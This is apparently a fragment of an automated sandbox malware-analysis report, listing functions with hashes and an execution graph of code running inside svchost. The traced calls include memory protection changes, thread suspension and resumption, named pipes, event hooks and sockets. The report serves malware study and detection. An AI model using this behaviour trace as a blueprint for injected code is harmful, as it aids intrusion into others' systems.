                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                          • Instruction ID: 8c7111abe67a53de118ffcce1231104222eec44d431b6dbf19f48e34e9ac190b
                                                                                                                                                                                          • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD05E10724D0D1BEA99662D5C95766519AEBDC261F50013AA41EC2281E9A8CC550250
                                                                                                                                                                                          Function 00007DF4415ED66C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(?,00007DF4415FEF2F,?,?,?,?,00000000,00000000), ref: 00007DF4415ED689
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                          • Opcode ID: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                                                                          • Instruction ID: 6fcdbc3ac54c0e221d44322ead5b917a341a534d2e8156fa972889115c7a9280
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE04F3171484887F34AFB31DD994E773A1FBA6300B804663D807810F6EEBDB24ACA81
                                                                                                                                                                                          Function 00007DF44157DA74 Relevance: 1.4, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007DF44158E150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF44158C0F7), ref: 00007DF44158E160
                                                                                                                                                                                          • malloc.MSVCRT ref: 00007DF44157DB44
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPortmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3101135750-0
                                                                                                                                                                                          • Opcode ID: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                                                                          • Instruction ID: 9e7070b438386c93475d8f065bf7338f0154836897e60be8be1b5a509f7b2417
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47418C70508A4C8FEB65EF18D8867EA77E4FB98301F10057BD85EC7261DA34E984CB92
                                                                                                                                                                                          Function 00007DF441564F54 Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                          • Opcode ID: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                                                                                          • Instruction ID: 09e5aaa46c14ade35ac9048224f4d2d00f205ea1dc323073da9ccf17f9943c7f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 15318231618A4AAFF755FA64D8499B6B3E4FF94390700422AD82FC25A1EFB4F85187C1
                                                                                                                                                                                          Function 00007DF44163EA54 Relevance: 1.4, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2635317215-0
                                                                                                                                                                                          • Opcode ID: 846e1ff395a9a0e97b589690a9bc8b88936b2e8aac8a799f01e9c267aa4d71c2
                                                                                                                                                                                          • Instruction ID: 4a6ebda23983634011d4d76c71a938dccc8efd582888138732d988a81bc067f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 846e1ff395a9a0e97b589690a9bc8b88936b2e8aac8a799f01e9c267aa4d71c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: F041C970A08A1C8FDB95EF1894847D17AE1FB68701F1842BBDC4DCF25ADB749885CBA0
                                                                                                                                                                                          Function 00007DF4415851A0 Relevance: 1.3, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2635317215-0
                                                                                                                                                                                          • Opcode ID: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                                                                                          • Instruction ID: 59c873536f2cc3d1156bc31a3173e3390ff1567abc0cecc1ed83b3803f597e17
                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69218430618A484FEB85FF28C8C579673E5FB98310F5045B6981EC72AADE74D855CB90
                                                                                                                                                                                          Function 00007DF44162AD9C Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                          • Opcode ID: 93b3089d9039be6dc48e4ad706bd316baf3c3e69dc3f5e79b84e474d63088cbc
                                                                                                                                                                                          • Instruction ID: 3c290a1bec5bf195a9ef48cac82434f17153a9fd4a0b9ee965ff91407c9a108a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 93b3089d9039be6dc48e4ad706bd316baf3c3e69dc3f5e79b84e474d63088cbc
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE214C70604A488FEB84EF2CC0CCBA077E0FB5D355F5441BAE45DCB299DBB498858B01
                                                                                                                                                                                          Function 00007DF4415731B4 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                          • Opcode ID: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                                                                                          • Instruction ID: 099c30134e3f7cec0be9b9d27917ffd04ee72ad21c46a1b944ef2e9b373fc41f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F11A530B045445BF7E9EB68995A3B732E1EFD4210F14427BD82FD2476ED789904D740
                                                                                                                                                                                          Function 00007DF44156272C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                                                                          • Instruction ID: 76135553bba9f6ff3897140f0d66887012eb1c29b71c899976bf661cba859aa8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0016730A18D0A9BEB99EB2C9804A6633E1FB98355754813ED01ED76E0DB7DE8428781
                                                                                                                                                                                          Function 000002435D4219B4 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 80 2435d4219b4-2435d4219d1 82 2435d4219d3-2435d4219da 80->82 83 2435d4219dd-2435d4219e4 80->83 82->83 84 2435d4219e6-2435d4219f9 VirtualFree 83->84 85 2435d4219fb-2435d421a09 83->85 84->85
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000002.2781939497.000002435D420000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002435D420000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_2435d420000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                                                                                          • Instruction ID: bed0f44d9ba5b466b35b61b02bbc8743a79ba09dd75030ecf7b557c1d455b011
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                                                                                          • Instruction Fuzzy Hash: ACF03071155A098FDF5CEF55C4C8BB533A4FB2C301F540179CC0ACB156DA21D941C751
                                                                                                                                                                                          Function 00007DF441564090 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2635317215-0
                                                                                                                                                                                          • Opcode ID: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                                                                                          • Instruction ID: d2540db955c66f21e7b2e441c73bc43c756ddaf8d858523b2aa1ab95a4f804d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF05E3061490A5FF785AB28D898BB676E4EF98351F944076D90ACA2A0DEB8CC95D740
                                                                                                                                                                                          Function 00007DF4415C3A10 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                                                                          • Instruction ID: 2f0ffab1909f4338ebcca07d70ebe34ca504a354729bee7cf16dd8aef506b23e
                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03630A1B94EDBFBA97B69986827577F1DF54301B04002AE807D15B0DBBC94549721
                                                                                                                                                                                          Function 00007DF4415640EC Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                                                                          • Instruction ID: 182d2896cbf00b74f9356792673aa581d322794d82c5e02d7e813f25597bc3c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D05E3070AD0B4BFF9DBBAA84A967532E0DFA8382710003D941BD25A1CE69C841D340
                                                                                                                                                                                          Function 00007DF441564D90 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                                                                                          • Instruction ID: 825588ef694161241876d106e1248bd94e3e351c4e592baced14abceffaec9eb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69B0922881A8EB12ED5932B68C5A06A2460AB54201F840019A82BC0460E66C80948282

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 000002435D420511 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000002.2781939497.000002435D420000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002435D420000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_2435d420000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                          • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F
                                                                                                                                                                                          Function 00007DF441591741 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                                                                          • Instruction ID: 6b5de7765083f1fcecf79d76d96fc317e58b19ab22377307484a88b0d29399c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4B01122E2880082C2080E0AB802330F2B2C30B300F003030200AF3A20C8A0CC802ACF

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:4.2%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:24.4%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:312
                                                                                                                                                                                          Total number of Limit Nodes:32
                                                                                                                                                                                          execution_graph 34189 286f60874f0 34192 286f6087528 34189->34192 34190 286f6087782 34191 286f60875c3 VirtualFree 34191->34192 34192->34190 34192->34191 34193 286f608bef0 34194 286f608bf19 34193->34194 34195 286f608bf47 LoadLibraryA 34194->34195 34196 286f608bf29 34194->34196 34195->34196 34201 7df465603cdc 34202 7df465603ce9 34201->34202 34204 7df465603d54 34201->34204 34203 7df465603d1b SetWinEventHook 34202->34203 34202->34204 34203->34204 34205 286f6082908 34206 286f608295b 34205->34206 34207 286f608291a 34205->34207 34207->34206 34208 286f608293d ResumeThread 34207->34208 34208->34207 34209 286f608bc28 34210 286f608bc2d 34209->34210 34212 286f608bc56 34209->34212 34213 286f608ba4c 34210->34213 34214 286f608ba6d 34213->34214 34215 286f608bb44 CreateWindowExW 34214->34215 34216 286f608bba1 34214->34216 34215->34216 34216->34212 34217 7df465608c38 SetErrorMode 34218 7df465608c4c 34217->34218 34219 7df46560c8f2 socket 34218->34219 34220 7df46560c936 closesocket 34219->34220 34221 7df46560c981 34219->34221 34223 7df46560c987 socket 34220->34223 34221->34223 34224 7df46560c99f 34223->34224 34225 7df4656522cc 34227 7df4656522ee 34225->34227 34226 7df46565276d 34227->34226 34233 7df465651290 34227->34233 34231 7df465652329 34231->34226 34232 7df465652754 SetTimer 34231->34232 34232->34226 34234 7df4656512c3 34233->34234 34235 7df46565129d 34233->34235 34237 7df4656512c8 34234->34237 34235->34234 34236 7df4656512a3 RtlAddFunctionTable 34235->34236 34236->34234 34238 7df4656512e8 VirtualProtect 34237->34238 34240 7df4656512f7 34237->34240 34238->34240 34239 7df465651395 34239->34231 34240->34239 34241 7df465651371 VirtualProtect 34240->34241 34241->34240 34242 286f608262c 34245 286f608265f 34242->34245 34243 286f6082738 34244 286f608288e 34243->34244 34248 286f6082771 SuspendThread 34243->34248 34245->34243 34246 286f6082680 Thread32First 34245->34246 34247 286f6082685 34246->34247 34249 286f608272f CloseHandle 34247->34249 34248->34243 34249->34243 34250 286f608698c 34251 286f60869a6 34250->34251 34252 286f60869b0 34251->34252 34253 286f60869ab LoadLibraryA 34251->34253 34253->34252 34254 7df4656325d4 NtQuerySystemInformation 34255 7df4656325f7 34254->34255 34256 7df46563262f 34255->34256 34257 7df465632613 NtQuerySystemInformation 34255->34257 34257->34256 34258 286f608cee0 34259 286f608cef3 34258->34259 34263 286f608cf49 34258->34263 34264 286f608a7e0 34259->34264 34261 286f608cf05 34262 286f608cf28 ReadFile 34261->34262 34262->34263 34265 286f608a800 34264->34265 34266 286f608a847 34264->34266 34265->34266 34267 286f608a86b malloc 34265->34267 34266->34261 34267->34266 34268 7df465603cb0 34269 7df465603cc7 34268->34269 34272 7df465602f48 34269->34272 34271 7df465603cd5 34273 7df465602f6a 34272->34273 34275 7df465602f87 34273->34275 34276 7df465602e90 NtQuerySystemInformation 34273->34276 34275->34271 34277 7df465602eb3 34276->34277 34278 7df465602ecf NtQuerySystemInformation 34277->34278 34279 7df465602eeb 34277->34279 34278->34279 34279->34275 34280 7df465604290 34282 7df4656042c3 34280->34282 34281 7df4656044c0 34282->34281 34291 7df465601708 34282->34291 34286 7df4656042fe 34286->34281 34288 7df4656043f0 calloc 34286->34288 34289 7df465604453 34286->34289 34300 7df4656031bc free 34286->34300 34287 7df46560449b SendMessageA 34287->34281 34288->34286 34289->34287 34292 7df46560173b 34291->34292 34293 7df465601715 34291->34293 34295 7df465601740 34292->34295 34293->34292 34294 7df46560171b RtlAddFunctionTable 34293->34294 34294->34292 34296 7df465601760 VirtualProtect 34295->34296 34298 7df46560176f 34295->34298 34296->34298 34297 7df46560180d 34297->34286 34298->34297 34299 7df4656017e9 VirtualProtect 34298->34299 34299->34298 34300->34286 34301 286f6092d80 34302 286f6092d9f 34301->34302 34303 286f6092d90 NtAcceptConnectPort 34301->34303 34303->34302 34304 286f60984c0 SetErrorMode 34305 286f60984d4 34304->34305 34306 286f609b936 socket 34305->34306 34307 286f609b9c3 socket 34306->34307 34308 286f609b97a getsockopt 34306->34308 34310 286f609b9e3 34307->34310 34308->34307 34311 7df4656347b8 34312 7df4656347ee 34311->34312 34313 7df465634b08 34312->34313 34321 7df465631708 34312->34321 34317 7df46563482b 34317->34313 34318 7df4656349e3 SendMessageA 34317->34318 34320 7df465634a12 34317->34320 34318->34320 34330 7df465632730 NtQuerySystemInformation NtQuerySystemInformation 34320->34330 34322 7df465631715 34321->34322 34323 7df46563173b 34321->34323 34322->34323 34324 7df46563171b RtlAddFunctionTable 34322->34324 34325 7df465631740 34323->34325 34324->34323 34326 7df465631760 VirtualProtect 34325->34326 34328 7df46563176f 34325->34328 34326->34328 34327 7df46563180d 34327->34317 34328->34327 34329 7df4656317e9 VirtualProtect 34328->34329 34329->34328 34331 286f608d004 34332 286f608d057 34331->34332 34339 286f608aef0 34332->34339 34334 286f608d07f CreateNamedPipeW 34335 286f608d0c7 34334->34335 34338 286f608d109 34334->34338 34336 286f608d0e0 BindIoCompletionCallback 34335->34336 34337 286f608d0f8 ConnectNamedPipe 34336->34337 34336->34338 34337->34338 34340 286f608af2c 34339->34340 34343 286f6092e84 34340->34343 34342 286f608af34 34342->34334 34344 286f6092eb2 34343->34344 34345 286f6092e98 NtAcceptConnectPort 34343->34345 34344->34342 34345->34344 34346 7df46561063c 34347 7df465610655 34346->34347 34348 7df46561064e 34346->34348 34347->34348 34349 7df46561068e free 34347->34349 34349->34348 34350 286f6085918 34353 286f6086c68 34350->34353 34352 286f608592a 34354 286f6086c71 34353->34354 34355 286f6086d54 34353->34355 34354->34355 34364 286f6093218 34354->34364 34355->34352 34357 286f6086d06 34357->34355 34372 286f6083c88 34357->34372 34359 286f6086d12 34360 286f6086d29 SetErrorMode 34359->34360 34361 286f6086d42 34360->34361 34363 286f6086d6c 34360->34363 34361->34355 34376 286f60869ec 34361->34376 34363->34352 34369 286f6093265 34364->34369 34365 286f60942a6 34365->34357 34366 286f6093d5a RtlFormatCurrentUserKeyPath 34367 286f6093d66 34366->34367 34367->34365 34368 286f6093eab calloc 34367->34368 34368->34365 34370 286f6093ed1 34368->34370 34369->34365 34369->34366 34369->34367 34370->34365 34392 286f608563c 6 API calls 34370->34392 34373 286f6083c95 34372->34373 34374 286f6083cbb 34372->34374 34373->34374 34375 286f6083c9b RtlAddFunctionTable 34373->34375 34374->34359 34375->34374 34377 286f60869f5 34376->34377 34379 286f6086a68 34376->34379 34378 286f6086acd 34377->34378 34381 286f6086a21 34377->34381 34420 286f609105c 16 API calls 34378->34420 34379->34355 34381->34379 34382 286f6086a99 34381->34382 34383 286f6086a3d 34381->34383 34419 286f60916c8 13 API calls 34382->34419 34385 286f6086a42 34383->34385 34386 286f6086a8c 34383->34386 34387 286f6086a77 34385->34387 34388 286f6086a47 34385->34388 34418 286f6091188 16 API calls 34386->34418 34417 286f60912bc 18 API calls 34387->34417 34388->34379 34393 286f608d7c0 34388->34393 34392->34365 34394 286f608d7e0 34393->34394 34421 286f608aa34 34394->34421 34396 286f608d7f3 34397 286f608d85f CloseHandle 34396->34397 34398 286f608d7fb MapViewOfFile 34396->34398 34399 286f608d871 34397->34399 34400 286f608d92b 34397->34400 34405 286f608d825 34398->34405 34399->34400 34424 286f6082b54 34399->34424 34446 286f608a9d4 34400->34446 34404 286f608d881 34404->34400 34428 286f608e2a8 34404->34428 34410 286f608d84a 34405->34410 34444 286f6090674 malloc 34405->34444 34410->34397 34411 286f608d893 34437 286f608d3b4 6 API calls 34411->34437 34413 286f608d898 34438 286f60879a0 34413->34438 34415 286f608d8e7 34445 286f6082ba8 6 API calls 34415->34445 34417->34379 34418->34379 34419->34379 34420->34379 34422 286f608aa4f malloc 34421->34422 34423 286f608aa6a 34421->34423 34422->34423 34423->34396 34425 286f6082b64 34424->34425 34426 286f6082b6d HeapCreate 34425->34426 34427 286f6082b86 34425->34427 34426->34427 34427->34404 34429 286f608e2c0 34428->34429 34433 286f608e30a 34429->34433 34449 286f6082c24 34429->34449 34431 286f608e317 VirtualProtect 34453 286f6081000 34431->34453 34432 286f608d88e 34436 286f608e1dc GetSystemInfo VirtualAlloc 34432->34436 34433->34431 34433->34432 34435 286f608e344 VirtualProtect 34435->34432 34436->34411 34437->34413 34441 286f60879ce 34438->34441 34439 286f6087c40 34439->34415 34440 286f608a9d4 free 34440->34439 34441->34439 34443 286f6087b8e 34441->34443 34462 286f60877dc 34441->34462 34443->34440 34444->34410 34445->34400 34447 286f608a9e7 free 34446->34447 34448 286f608a9f8 34446->34448 34447->34447 34447->34448 34448->34379 34450 286f6082c52 34449->34450 34452 286f6082cbc 34450->34452 34455 286f60824c4 34450->34455 34452->34433 34454 286f608100c 34453->34454 34454->34435 34458 286f60822d4 GetSystemInfo 34455->34458 34459 286f6082305 34458->34459 34460 286f60823a4 VirtualAlloc 34459->34460 34461 286f60823cf 34459->34461 34460->34459 34460->34461 34461->34452 34463 286f6087804 34462->34463 34470 286f6093158 34463->34470 34465 286f608782d 34467 286f6087879 34465->34467 34474 286f6092ec8 34465->34474 34468 286f60878bb GetVolumeInformationW 34467->34468 34469 286f608790c 34467->34469 34468->34469 34469->34443 34471 286f609317b 34470->34471 34472 286f6093173 34470->34472 34471->34472 34473 286f60931dc NtAcceptConnectPort 34471->34473 34472->34465 34473->34472 34475 286f6092f11 34474->34475 34476 286f6092f67 NtAcceptConnectPort 34475->34476 34477 286f6092f1b 34475->34477 34476->34477 34477->34467 34478 286f6082978 34479 286f608299e 34478->34479 34480 286f60829a6 VirtualProtect 